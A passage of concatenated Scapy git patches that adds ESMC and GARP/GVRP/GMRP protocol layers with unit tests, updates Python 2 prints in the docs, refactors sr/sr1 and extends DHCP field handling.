PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . + +# scapy.contrib.description = Slow Protocol +# scapy.contrib.status = loads + +from scapy.packet import Packet, bind_layers +from scapy.fields import ByteEnumField +from scapy.layers.l2 import Ether +from scapy.data import ETHER_TYPES + + +ETHER_TYPES[0x8809] = 'SlowProtocol' +SLOW_SUB_TYPES = { + 'Unused': 0, + 'LACP': 1, + 'Marker Protocol': 2, + 'OAM': 3, + 'OSSP': 10, +} + + +class SlowProtocol(Packet): + name = "SlowProtocol" + fields_desc = [ByteEnumField("subtype", 0, SLOW_SUB_TYPES)] + + +bind_layers(Ether, SlowProtocol, type=0x8809, dst='01:80:c2:00:00:02') From e1e43a880d927ba405dfd9a9d92329bd73a20c2e Mon Sep 17 00:00:00 2001 From: Lars Munch Date: Sat, 23 Apr 2022 22:04:39 +0200 Subject: [PATCH 0792/1632] Added ESMC protocol Added ESMC protocol accorting to ITU-T G.8264/Y.1364 --- scapy/contrib/esmc.py | 66 +++++++++++++++++++++++++++++++++++++++++++ test/contrib/esmc.uts | 33 ++++++++++++++++++++++ 2 files changed, 99 insertions(+) create mode 100644 scapy/contrib/esmc.py create mode 100644 test/contrib/esmc.uts diff --git a/scapy/contrib/esmc.py b/scapy/contrib/esmc.py new file mode 100644 index 00000000000..6490aa41d4d --- /dev/null +++ b/scapy/contrib/esmc.py @@ -0,0 +1,66 @@ +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . + +# scapy.contrib.description = Ethernet Synchronization Message Channel (ESMC) +# scapy.contrib.status = loads + +from scapy.packet import Packet, bind_layers +from scapy.fields import BitField, ByteField, XByteField, ShortField, XStrFixedLenField # noqa: E501 +from scapy.contrib.slowprot import SlowProtocol +from scapy.compat import orb + + +class ESMC(Packet): + name = "ESMC" + fields_desc = [ + XStrFixedLenField("ituOui", b"\x00\x19\xa7", 3), + ShortField("ituSubtype", 1), + BitField("version", 1, 4), + BitField("event", 0, 1), + BitField("reserved1", 0, 3), + XStrFixedLenField("reserved2", b"\x00" * 3, 3), + ] + + def guess_payload_class(self, payload): + if orb(payload[0]) == 1: + return QLTLV + if orb(payload[0]) == 2: + return EQLTLV + return Packet.guess_payload_class(self, payload) + + +class QLTLV(ESMC): + name = "QLTLV" + fields_desc = [ + ByteField("type", 1), + ShortField("length", 4), + XByteField("ssmCode", 0xf), + ] + + +class EQLTLV(ESMC): + name = "EQLTLV" + fields_desc = [ + ByteField("type", 2), + ShortField("length", 0x14), + XByteField("enhancedSsmCode", 0xFF), + XStrFixedLenField("clockIdentity", b"\x00" * 8, 8), + ByteField("flag", 0), + ByteField("cascaded_eEEcs", 1), + ByteField("cascaded_EEcs", 0), + XStrFixedLenField("reserved", b"\x00" * 5, 5), + ] + + +bind_layers(SlowProtocol, ESMC, subtype=10) diff --git a/test/contrib/esmc.uts b/test/contrib/esmc.uts new file mode 100644 index 00000000000..1602c6e5394 --- /dev/null +++ b/test/contrib/esmc.uts @@ -0,0 +1,33 @@ +% ESMC unit tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('esmc')" -t test/contrib/esmc.uts + ++ ESMC + += Build & dissect ESMC and QLTLV + +pkt = Ether(src="00:13:c4:12:0f:0d") / SlowProtocol() / ESMC(event=1) / QLTLV(ssmCode=0x2) +pkt.show() +s = raw(pkt) +raw_pkt = b'\x01\x80\xc2\x00\x00\x02\x00\x13\xc4\x12\x0f\x0d\x88\x09\x0a\x00\x19\xa7\x00' \ + b'\x01\x18\x00\x00\x00\x01\x00\x04\x02' +assert(s == raw_pkt) + +p = Ether(s) +assert(SlowProtocol in p and ESMC in p and QLTLV in p) +assert(raw(p) == raw_pkt) + += Build & dissect ESMC and EQLTLV + +pkt = pkt / EQLTLV(clockIdentity=b'\x11\x22\x33\x44\x55\x66\x77\x88') +pkt.show() +s = raw(pkt) +raw_pkt = b'\x01\x80\xc2\x00\x00\x02\x00\x13\xc4\x12\x0f\x0d\x88\x09\x0a\x00\x19\xa7\x00' \ + b'\x01\x18\x00\x00\x00\x01\x00\x04\x02\x02\x00\x14\xff\x11\x22\x33\x44\x55\x66' \ + b'\x77\x88\x00\x01\x00\x00\x00\x00\x00\x00' +assert(s == raw_pkt) + +p = Ether(s) +assert(SlowProtocol in p and ESMC in p and QLTLV in p and EQLTLV in p) +assert(raw(p) == raw_pkt) From 015e80443999ad2d355d70c631e6f93b9e2eca29 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 7 Jun 2022 11:12:05 +0200 Subject: [PATCH 0793/1632] Fix Python2 prints in doc --- doc/scapy/advanced_usage.rst | 16 ++++++++-------- doc/scapy/extending.rst | 24 ++++++++++++------------ 2 files changed, 20 insertions(+), 20 deletions(-) diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index 7dd26df2491..3a451b1f9f1 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -509,20 +509,20 @@ Let's begin with a simple example. I take the convention to write states with ca class HelloWorld(Automaton): @ATMT.state(initial=1) def BEGIN(self): - print "State=BEGIN" + print("State=BEGIN") @ATMT.condition(BEGIN) def wait_for_nothing(self): - print "Wait for nothing..." + print("Wait for nothing...") raise self.END() @ATMT.action(wait_for_nothing) def on_nothing(self): - print "Action on 'nothing' condition" + print("Action on 'nothing' condition") @ATMT.state(final=1) def END(self): - print "State=END" + print("State=END") In this example, we can see 3 decorators: @@ -558,7 +558,7 @@ As an example, let's consider the following state:: @ATMT.state() def MY_STATE(self, param1, param2): - print "state=MY_STATE. param1=%r param2=%r" % (param1, param2) + print("state=MY_STATE. param1=%r param2=%r" % (param1, param2)) This state will be reached with the following code:: @@ -780,16 +780,16 @@ Actions are methods that are decorated by the return of ``ATMT.action`` function @ATMT.action(maybe_go_to_end) def maybe_action(self): - print "We are lucky..." + print("We are lucky...") @ATMT.action(certainly_go_to_end) def certainly_action(self): - print "We are not lucky..." + print("We are not lucky...") @ATMT.action(maybe_go_to_end, prio=1) @ATMT.action(certainly_go_to_end, prio=1) def always_action(self): - print "This wasn't luck!..." + print("This wasn't luck!...") The two possible outputs are:: diff --git a/doc/scapy/extending.rst b/doc/scapy/extending.rst index abb1f655081..569418e7f1d 100644 --- a/doc/scapy/extending.rst +++ b/doc/scapy/extending.rst @@ -48,22 +48,22 @@ This is a more complex example which does an ARP ping and reports what it found import sys if len(sys.argv) != 2: - print "Usage: arping2tex \n eg: arping2tex 192.168.1.0/24" + print("Usage: arping2tex \n eg: arping2tex 192.168.1.0/24") sys.exit(1) - from scapy.all import srp,Ether,ARP,conf - conf.verb=0 - ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]), - timeout=2) + from scapy.all import srp, Ether, ARP, conf + conf.verb = 0 + ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=sys.argv[1]), + timeout=2) - print r"\begin{tabular}{|l|l|}" - print r"\hline" - print r"MAC & IP\\" - print r"\hline" + print(r"\begin{tabular}{|l|l|}") + print(r"\hline") + print(r"MAC & IP\\") + print(r"\hline") for snd,rcv in ans: - print rcv.sprintf(r"%Ether.src% & %ARP.psrc%\\") - print r"\hline" - print r"\end{tabular}" + print(rcv.sprintf(r"%Ether.src% & %ARP.psrc%\\")) + print(r"\hline") + print(r"\end{tabular}") Here is another tool that will constantly monitor all interfaces on a machine and print all ARP request it sees, even on 802.11 frames from a Wi-Fi card in monitor mode. Note the store=0 parameter to sniff() to avoid storing all packets in memory for nothing:: From 50e867aa9ee9061e79890e5f535eb5ccb6e2a7f3 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 7 Jun 2022 14:21:59 +0200 Subject: [PATCH 0794/1632] Cleanup sr1() (#3610) --- scapy/sendrecv.py | 56 +++++++++++++++++++---------------------------- 1 file changed, 23 insertions(+), 33 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 270476979e8..88e8d91ed84 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -613,26 +613,6 @@ def _parse_tcpreplay_result(stdout_b, stderr_b, argv): return {} -@conf.commands.register -def sr(x, # type: _PacketIterable - promisc=None, # type: Optional[bool] - filter=None, # type: Optional[str] - iface=None, # type: Optional[_GlobInterfaceType] - nofilter=0, # type: int - *args, # type: Any - **kargs # type: Any - ): - # type: (...) -> Tuple[SndRcvList, PacketList] - """ - Send and receive packets at layer 3 - """ - s = conf.L3socket(promisc=promisc, filter=filter, - iface=iface, nofilter=nofilter) - result = sndrcv(s, x, *args, **kargs) - s.close() - return result - - def _interface_selection(iface, # type: Optional[_GlobInterfaceType] packet # type: _PacketIterable ): @@ -652,24 +632,34 @@ def _interface_selection(iface, # type: Optional[_GlobInterfaceType] @conf.commands.register -def sr1(x, # type: _PacketIterable - promisc=None, # type: Optional[bool] - filter=None, # type: Optional[str] - iface=None, # type: Optional[_GlobInterfaceType] - nofilter=0, # type: int - *args, # type: Any - **kargs # type: Any - ): - # type: (...) -> Optional[Packet] +def sr(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + nofilter=0, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] """ - Send packets at layer 3 and return only the first answer + Send and receive packets at layer 3 """ iface = _interface_selection(iface, x) s = conf.L3socket(promisc=promisc, filter=filter, - nofilter=nofilter, iface=iface) - ans, _ = sndrcv(s, x, *args, **kargs) + iface=iface, nofilter=nofilter) + result = sndrcv(s, x, *args, **kargs) s.close() - if len(ans) > 0: + return result + + +@conf.commands.register +def sr1(*args, **kargs): + # type: (*Packet, **Any) -> Optional[Packet] + """ + Send packets at layer 3 and return only the first answer + """ + ans, _ = sr(*args, **kargs) + if ans: return cast(Packet, ans[0][1]) return None From b3726ca2bf2b0e7d4999c6165807a7a314bf962f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 7 Jun 2022 15:04:07 +0200 Subject: [PATCH 0795/1632] Make DHCP more user-friendly (#3494) --- scapy/fields.py | 48 ++++++++++----- scapy/layers/dhcp.py | 142 ++++++++++++++++++++++++++++++++++--------- scapy/layers/l2.py | 26 +++++++- 3 files changed, 172 insertions(+), 44 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index b0e333bb388..1f8d8ab98df 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1387,6 +1387,38 @@ def i2h(self, pkt, x): return bytes_encode(x).decode('utf-16', errors="replace") +class _StrEnumField: + def __init__(self, **kwargs): + # type: (**Any) -> None + self.enum = kwargs.pop("enum", {}) + + def i2repr(self, pkt, v): + # type: (Optional[Packet], bytes) -> str + r = v.rstrip(b"\0") + rr = repr(r) + if self.enum: + if v in self.enum: + rr = "%s (%s)" % (rr, self.enum[v]) + elif r in self.enum: + rr = "%s (%s)" % (rr, self.enum[r]) + return rr + + +class StrEnumField(_StrEnumField, StrField): + __slots__ = ["enum"] + + def __init__( + self, + name, # type: str + default, # type: bytes + enum=None, # type: Optional[Dict[str, str]] + **kwargs # type: Any + ): + # type: (...) -> None + StrField.__init__(self, name, default, **kwargs) # type: ignore + self.enum = enum + + K = TypeVar('K', List[BasePacket], BasePacket, Optional[BasePacket]) @@ -1731,33 +1763,21 @@ def randval(self): return RandBin(RandNum(0, 200)) -class StrFixedLenEnumField(StrFixedLenField): +class StrFixedLenEnumField(_StrEnumField, StrFixedLenField): __slots__ = ["enum"] def __init__( self, name, # type: str default, # type: bytes - length=None, # type: Optional[int] enum=None, # type: Optional[Dict[str, str]] + length=None, # type: Optional[int] length_from=None # type: Optional[Callable[[Optional[Packet]], int]] # noqa: E501 ): # type: (...) -> None StrFixedLenField.__init__(self, name, default, length=length, length_from=length_from) # noqa: E501 self.enum = enum - def i2repr(self, pkt, w): - # type: (Optional[Packet], bytes) -> str - v = plain_str(w) - r = v.rstrip("\0") - rr = repr(r) - if self.enum: - if v in self.enum: - rr = "%s (%s)" % (rr, self.enum[v]) - elif r in self.enum: - rr = "%s (%s)" % (rr, self.enum[r]) - return rr - class NetBIOSNameField(StrFixedLenField): def __init__(self, name, default, length=31): diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index eab081e452f..1c536b0a9ad 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -5,6 +5,11 @@ """ DHCP (Dynamic Host Configuration Protocol) and BOOTP + +Implements: +- rfc951 - BOOTSTRAP PROTOCOL (BOOTP) +- rfc1542 - Clarifications and Extensions for the Bootstrap Protocol +- rfc1533 - DHCP Options and BOOTP Vendor Extensions """ from __future__ import absolute_import @@ -23,13 +28,25 @@ from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Net from scapy.compat import chb, orb, bytes_encode -from scapy.fields import ByteEnumField, ByteField, Field, FieldListField, \ - FlagsField, IntField, IPField, ShortField, StrField +from scapy.fields import ( + ByteEnumField, + ByteField, + Field, + FieldListField, + FlagsField, + IntField, + IPField, + ShortField, + StrEnumField, + StrField, + StrFixedLenField, + XIntField, +) from scapy.layers.inet import UDP, IP -from scapy.layers.l2 import Ether +from scapy.layers.l2 import Ether, HARDWARE_TYPES from scapy.packet import bind_layers, bind_bottom_up, Packet -from scapy.utils import atol, itom, ltoa, sane -from scapy.volatile import RandBin, RandField, RandNum, RandNumExpo +from scapy.utils import atol, itom, ltoa, sane, str2mac +from scapy.volatile import RandBin, RandField, RandInt, RandNum, RandNumExpo from scapy.arch import get_if_raw_hwaddr from scapy.sendrecv import srp1, sendp @@ -40,23 +57,34 @@ dhcpmagic = b"c\x82Sc" +class _BOOTP_chaddr(StrFixedLenField): + def i2repr(self, pkt, v): + if pkt.htype == 1: # Ethernet + if v[6:] == b"\x00" * 10: # Default padding + return "%s (+ 10 nul pad)" % str2mac(v[:6]) + else: + return "%s (pad: %s)" % (str2mac(v[:6]), v[6:]) + return super(_BOOTP_chaddr, self).i2repr(pkt, v) + + class BOOTP(Packet): name = "BOOTP" - fields_desc = [ByteEnumField("op", 1, {1: "BOOTREQUEST", 2: "BOOTREPLY"}), - ByteField("htype", 1), - ByteField("hlen", 6), - ByteField("hops", 0), - IntField("xid", 0), - ShortField("secs", 0), - FlagsField("flags", 0, 16, "???????????????B"), - IPField("ciaddr", "0.0.0.0"), - IPField("yiaddr", "0.0.0.0"), - IPField("siaddr", "0.0.0.0"), - IPField("giaddr", "0.0.0.0"), - Field("chaddr", b"", "16s"), - Field("sname", b"", "64s"), - Field("file", b"", "128s"), - StrField("options", b"")] + fields_desc = [ + ByteEnumField("op", 1, {1: "BOOTREQUEST", 2: "BOOTREPLY"}), + ByteEnumField("htype", 1, HARDWARE_TYPES), + ByteField("hlen", 6), + ByteField("hops", 0), + XIntField("xid", 0), + ShortField("secs", 0), + FlagsField("flags", 0, 16, "???????????????B"), + IPField("ciaddr", "0.0.0.0"), + IPField("yiaddr", "0.0.0.0"), + IPField("siaddr", "0.0.0.0"), + IPField("giaddr", "0.0.0.0"), + _BOOTP_chaddr("chaddr", b"", length=16), + StrFixedLenField("sname", b"", length=64), + StrFixedLenField("file", b"", length=128), + StrEnumField("options", b"", {dhcpmagic: "DHCP magic"})] def guess_payload_class(self, payload): if self.options[:len(dhcpmagic)] == dhcpmagic: @@ -157,6 +185,8 @@ def addfield(self, pkt, s, val): # = range(4) # +# DHCP Options and BOOTP Vendor Extensions + DHCPTypes = { 1: "discover", @@ -337,6 +367,12 @@ def _fix(self): class DHCPOptionsField(StrField): + """ + A field that builds and dissects DHCP options. + The internal value is a list of tuples with the format + [("option_name", ), ...] + Where expected names and values can be found using `DHCPOptions` + """ islist = 1 def i2repr(self, pkt, x): @@ -348,8 +384,7 @@ def i2repr(self, pkt, x): vv = ",".join(f.i2repr(pkt, val) for val in v[1:]) else: vv = ",".join(repr(val) for val in v[1:]) - r = "%s=%s" % (v[0], vv) - s.append(r) + s.append("%s=%s" % (v[0], vv)) else: s.append(sane(v)) return "[%s]" % (" ".join(s)) @@ -442,6 +477,12 @@ class DHCP(Packet): name = "DHCP options" fields_desc = [DHCPOptionsField("options", b"")] + def mysummary(self): + for id in self.options: + if isinstance(id, tuple) and id[0] == "message-type": + return "DHCP %s" % DHCPTypes.get(id[1], "").capitalize() + return super(DHCP, self).mysummary() + bind_layers(UDP, BOOTP, dport=67, sport=68) bind_layers(UDP, BOOTP, dport=68, sport=67) @@ -450,17 +491,60 @@ class DHCP(Packet): @conf.commands.register -def dhcp_request(iface=None, **kargs): - """Send a DHCP discover request and return the answer""" +def dhcp_request(hw=None, + req_type='discover', + server_id=None, + requested_addr=None, + hostname=None, + iface=None, + **kargs): + """ + Send a DHCP discover request and return the answer. + + Usage:: + + >>> dhcp_request() # send DHCP discover + >>> dhcp_request(req_type='request', + ... requested_addr='10.53.4.34') # send DHCP request + """ if conf.checkIPaddr: warning( "conf.checkIPaddr is enabled, may not be able to match the answer" ) - if iface is None: - iface = conf.iface - fam, hw = get_if_raw_hwaddr(iface) - return srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / # noqa: E501 - BOOTP(chaddr=hw) / DHCP(options=[("message-type", "discover"), "end"]), iface=iface, **kargs) # noqa: E501 + if hw is None: + if iface is None: + iface = conf.iface + _, hw = get_if_raw_hwaddr(iface) + dhcp_options = [ + ('message-type', req_type), + ('client_id', b'\x01' + hw), + ] + if requested_addr is not None: + dhcp_options.append(('requested_addr', requested_addr)) + elif req_type == 'request': + warning("DHCP Request without requested_addr will likely be ignored") + if server_id is not None: + dhcp_options.append(('server_id', server_id)) + if hostname is not None: + dhcp_options.extend([ + ('hostname', hostname), + ('client_FQDN', b'\x00\x00\x00' + bytes_encode(hostname)), + ]) + dhcp_options.extend([ + ('vendor_class_id', b'MSFT 5.0'), + ('param_req_list', [ + 1, 3, 6, 15, 31, 33, 43, 44, 46, 47, 119, 121, 249, 252 + ]), + 'end' + ]) + return srp1( + Ether(dst="ff:ff:ff:ff:ff:ff", src=hw) / + IP(src="0.0.0.0", dst="255.255.255.255") / + UDP(sport=68, dport=67) / + BOOTP(chaddr=hw, xid=RandInt(), flags="B") / + DHCP(options=dhcp_options), + iface=iface, **kargs + ) class BOOTP_am(AnsweringMachine): diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index c294489c39a..04c1819ac9d 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -210,6 +210,30 @@ def i2m(self, pkt, x): # Layers +HARDWARE_TYPES = { + 1: "Ethernet (10Mb)", + 2: "Ethernet (3Mb)", + 3: "AX.25", + 4: "Proteon ProNET Token Ring", + 5: "Chaos", + 6: "IEEE 802 Networks", + 7: "ARCNET", + 8: "Hyperchannel", + 9: "Lanstar", + 10: "Autonet Short Address", + 11: "LocalTalk", + 12: "LocalNet", + 13: "Ultra link", + 14: "SMDS", + 15: "Frame relay", + 16: "ATM", + 17: "HDLC", + 18: "Fibre Channel", + 19: "ATM", + 20: "Serial Line", + 21: "ATM", +} + ETHER_TYPES[0x88a8] = '802_AD' ETHER_TYPES[ETH_P_MACSEC] = '802_1AE' @@ -402,7 +426,7 @@ class STP(Packet): class ARP(Packet): name = "ARP" fields_desc = [ - XShortField("hwtype", 0x0001), + XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES), XShortEnumField("ptype", 0x0800, ETHER_TYPES), FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"), FieldLenField("plen", None, fmt="B", length_of="psrc"), From e0477286f663a77a8b69501a0ef3a9739c8feef7 Mon Sep 17 00:00:00 2001 From: "Matsievskiy S.V" Date: Mon, 23 May 2022 12:54:39 +0300 Subject: [PATCH 0796/1632] Add GARP protocol and its two payload types GVRP and GMRP --- scapy/contrib/gxrp.py | 227 ++++++++++++++++++++++++++++++++++++++ test/contrib/gxrp.uts | 135 +++++++++++++++++++++++ test/pcaps/gvrp.pcapng.gz | Bin 0 -> 372 bytes 3 files changed, 362 insertions(+) create mode 100644 scapy/contrib/gxrp.py create mode 100644 test/contrib/gxrp.uts create mode 100644 test/pcaps/gvrp.pcapng.gz diff --git a/scapy/contrib/gxrp.py b/scapy/contrib/gxrp.py new file mode 100644 index 00000000000..65f6e0427dd --- /dev/null +++ b/scapy/contrib/gxrp.py @@ -0,0 +1,227 @@ +# scapy.contrib.description = Generic Attribute Register Protocol (GARP) +# scapy.contrib.status = loads + +""" + GARP - Generic Attribute Register Protocol + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + :author: Sergey Matsievskiy, matsievskiysv@gmail.com + :license: GPLv2 + + This module is free software; you can redistribute it and/or + modify it under the terms of the GNU General Public License + as published by the Free Software Foundation; either version 2 + of the License, or (at your option) any later version. + + This module is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + :description: + + This module provides Scapy layers for the GARP protocol and its + two applications: GARP VLAN Registration Protocol (GVRP) and + GARP Multicast Registration Protocol (GMRP) + + normative references: + - IEEE 802.1D 2004 - Media Access Control (MAC) Bridges + - IEEE 802.1Q 1998 - Virtual Bridged Local Area Networks + +""" +from scapy.fields import ( + LenField, + EnumField, + ByteField, + PacketListField, + ShortField, + MACField, +) +from scapy.packet import Packet, bind_layers, split_layers +from scapy.layers.l2 import LLC, Dot3 +from scapy.error import warning + + +class GVRP(Packet): + """ + GVRP + """ + + name = "GVRP" + + # IEEE802.1Q-1998 11.2.3.1.3 + fields_desc = [ShortField("vlan", 1)] + + def extract_padding(self, s): + return b"", s + + +class GMRP_GROUP(Packet): + """ + GMRP Group + """ + + name = "GMRP Group" + + # IEEE802.1D-2004 10.3.1.4 + fields_desc = [MACField("addr", None)] + + def extract_padding(self, s): + return b"", s + + +class GMRP_SERVICE(Packet): + """ + GMRP Service + """ + + name = "GMRP Service" + + # IEEE802.1D-2004 10.3.1.4 + fields_desc = [ + EnumField( + "event", + 0, + {0x0: "All Groups", 0x1: "All Unregistered Groups"}, + fmt="B", + ) + ] + + def extract_padding(self, s): + return b"", s + + +class GARP_ATTRIBUTE(Packet): + """ + GARP attribute container + """ + + name = "GARP Attribute" + + # IEEE802.1D-2004 12.10.2.4-5 + fields_desc = [ + LenField("len", None, fmt="B", adjust=lambda l: l + 2), + EnumField( + "event", + 0, + { + 0x0: "LeaveAll", + 0x1: "JoinEmpty", + 0x2: "JoinIn", + 0x3: "LeaveEmpty", + 0x4: "LeaveIn", + 0x5: "Empty", + }, + fmt="B", + ), + ] + + def do_dissect(self, s): + s = super(GARP_ATTRIBUTE, self).do_dissect(s) + if self.len is not None and self.event == 0 and self.len > 2: + warning("Non-empty payload at LeaveAll event") + return s + + def extract_padding(self, s): + boundary = self.len - 2 + return s[:boundary], s[boundary:] + + def guess_payload_class(self, payload): + try: + garp_message = self.parent + garp = garp_message.parent + llc = garp.underlayer + dot3 = llc.underlayer + if ( + dot3.dst == "01:80:c2:00:00:21" + ): # IEEE802.1D-2004 12.4 Table 12-1 + return GVRP + elif ( + dot3.dst == "01:80:c2:00:00:20" + ): # IEEE802.1D-2004 12.4 Table 12-1 + if garp_message.type == 1: # IEEE802.1D-2004 10.3.1.3 + return GMRP_GROUP + elif garp_message.type == 2: # IEEE802.1D-2004 10.3.1.3 + return GMRP_SERVICE + except AttributeError: + pass + return super(GARP_ATTRIBUTE, self).guess_payload_class(payload) + + +def parse_next_attr(pkt, lst, cur, remain): + # IEEE802.1D-2004 12.10.2.7 + if not remain or len(remain) == 0 or remain[0:1] == b"\x00": + return None + elif ord(remain[0:1]) >= 2: # minimal attribute size + return GARP_ATTRIBUTE + else: + return None + + +class GARP_MESSAGE(Packet): + """ + GARP message container + """ + + name = "GARP Message" + fields_desc = [ + ByteField("type", 0x01), + PacketListField("attrs", [], next_cls_cb=parse_next_attr), + ByteField("end_mark", 0x0), + ] + + def extract_padding(self, s): + return b"", s + + +def parse_next_msg(pkt, lst, cur, remain): + # IEEE802.1D-2004 12.10.2.7 + if not remain and len(remain) == 0 or remain[0:1] == b"\x00": + return None + else: + return GARP_MESSAGE + + +class GARP(Packet): + """ + GARP packet + """ + + name = "GARP" + + fields_desc = [ + ShortField("proto_id", 0x0001), # IEEE802.1D-2004 12.10.2.1 + PacketListField("msgs", [], next_cls_cb=parse_next_msg), + ByteField("end_mark", 0x0), + ] # IEEE802.1D-2004 12.10.2.7 + + +class LLC_GARP(LLC): + """ + Dummy class for layer binding + """ + + payload_guess = [] + + +split_layers(Dot3, LLC) +# IEEE802.1D-2004 12.4 Table 12-1 +for mac in ["01:80:c2:00:00:20", + "01:80:c2:00:00:21", + "01:80:c2:00:00:22", + "01:80:c2:00:00:23", + "01:80:c2:00:00:24", + "01:80:c2:00:00:25", + "01:80:c2:00:00:26", + "01:80:c2:00:00:27", + "01:80:c2:00:00:28", + "01:80:c2:00:00:29", + "01:80:c2:00:00:2a", + "01:80:c2:00:00:2b", + "01:80:c2:00:00:2c", + "01:80:c2:00:00:2d", + "01:80:c2:00:00:2e", + "01:80:c2:00:00:2f"]: + bind_layers(Dot3, LLC_GARP, dst=mac) +bind_layers(Dot3, LLC) +bind_layers(LLC_GARP, GARP) diff --git a/test/contrib/gxrp.uts b/test/contrib/gxrp.uts new file mode 100644 index 00000000000..4c381c94958 --- /dev/null +++ b/test/contrib/gxrp.uts @@ -0,0 +1,135 @@ +# GXRP unit tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('gxrp')" -t test/contrib/gxrp.uts + ++ GVRP test + += Construction test + +pkt = GVRP(vlan=2) +assert pkt.vlan == 2 +assert pkt == GVRP(raw(pkt)) + ++ GMRP test + += GMRP_GROUP Construction test + +pkt = GMRP_GROUP(addr="01:23:45:67:89:00") +assert pkt.addr == "01:23:45:67:89:00" +assert pkt == GMRP_GROUP(raw(pkt)) + += GMRP_SERVICE Construction test + +pkt = GMRP_SERVICE(event="All Groups") +assert pkt.event == 0 +pkt = GMRP_SERVICE(event="All Unregistered Groups") +assert pkt.event == 1 +assert pkt == GMRP_SERVICE(raw(pkt)) + ++ GARP Attribute test + += GMRP_GROUP Construction test + +pkt = GARP_ATTRIBUTE(event='LeaveAll') +assert pkt.event == 0 +assert GARP_ATTRIBUTE(pkt.build()).len == 2 +assert len(pkt.build()) == 2 +pkt = GARP_ATTRIBUTE(event='JoinEmpty')/GVRP() +assert pkt.event == 1 +assert GARP_ATTRIBUTE(pkt.build()).len == 4 +assert len(pkt.build()) == 4 +pkt = GARP_ATTRIBUTE(event='JoinIn')/GVRP() +assert pkt.event == 2 +assert GARP_ATTRIBUTE(pkt.build()).len == 4 +assert len(pkt.build()) == 4 +pkt = GARP_ATTRIBUTE(event='LeaveEmpty')/GVRP() +assert pkt.event == 3 +assert GARP_ATTRIBUTE(pkt.build()).len == 4 +assert len(pkt.build()) == 4 +pkt = GARP_ATTRIBUTE(event='LeaveIn')/GVRP() +assert pkt.event == 4 +assert GARP_ATTRIBUTE(pkt.build()).len == 4 +assert len(pkt.build()) == 4 +pkt = GARP_ATTRIBUTE(event='Empty')/GVRP() +assert pkt.event == 5 +assert GARP_ATTRIBUTE(pkt.build()).len == 4 +assert len(pkt.build()) == 4 +pkt = GARP_ATTRIBUTE(event='JoinEmpty')/GVRP() +del pkt.payload +assert pkt == GARP_ATTRIBUTE(event='JoinEmpty') +assert GARP_ATTRIBUTE(raw(pkt)) == GARP_ATTRIBUTE(raw(GARP_ATTRIBUTE(event='JoinEmpty'))) +assert len(pkt.build()) == 2 + += GVRP Stacking test + +pkt = Dot3(dst="01:80:c2:00:00:21")/LLC_GARP(dsap=0x42, ssap=0x42, ctrl=3)/GARP( + msgs=[GARP_MESSAGE(attrs=[GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=1), + GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=2)]), + GARP_MESSAGE(attrs=[GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=3), + GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=4)])]) +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 1)[GVRP].vlan == 1 +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 2)[GVRP].vlan == 2 +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 1)[GVRP].vlan == 3 +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 2)[GVRP].vlan == 4 +pkt = Dot3(pkt.build()) +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 1)[GVRP].vlan == 1 +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 2)[GVRP].vlan == 2 +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 1)[GVRP].vlan == 3 +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 2)[GVRP].vlan == 4 + += GMRP Stacking test + +pkt = Dot3(dst="01:80:c2:00:00:20")/LLC_GARP(dsap=0x42, ssap=0x42, ctrl=3)/GARP( + 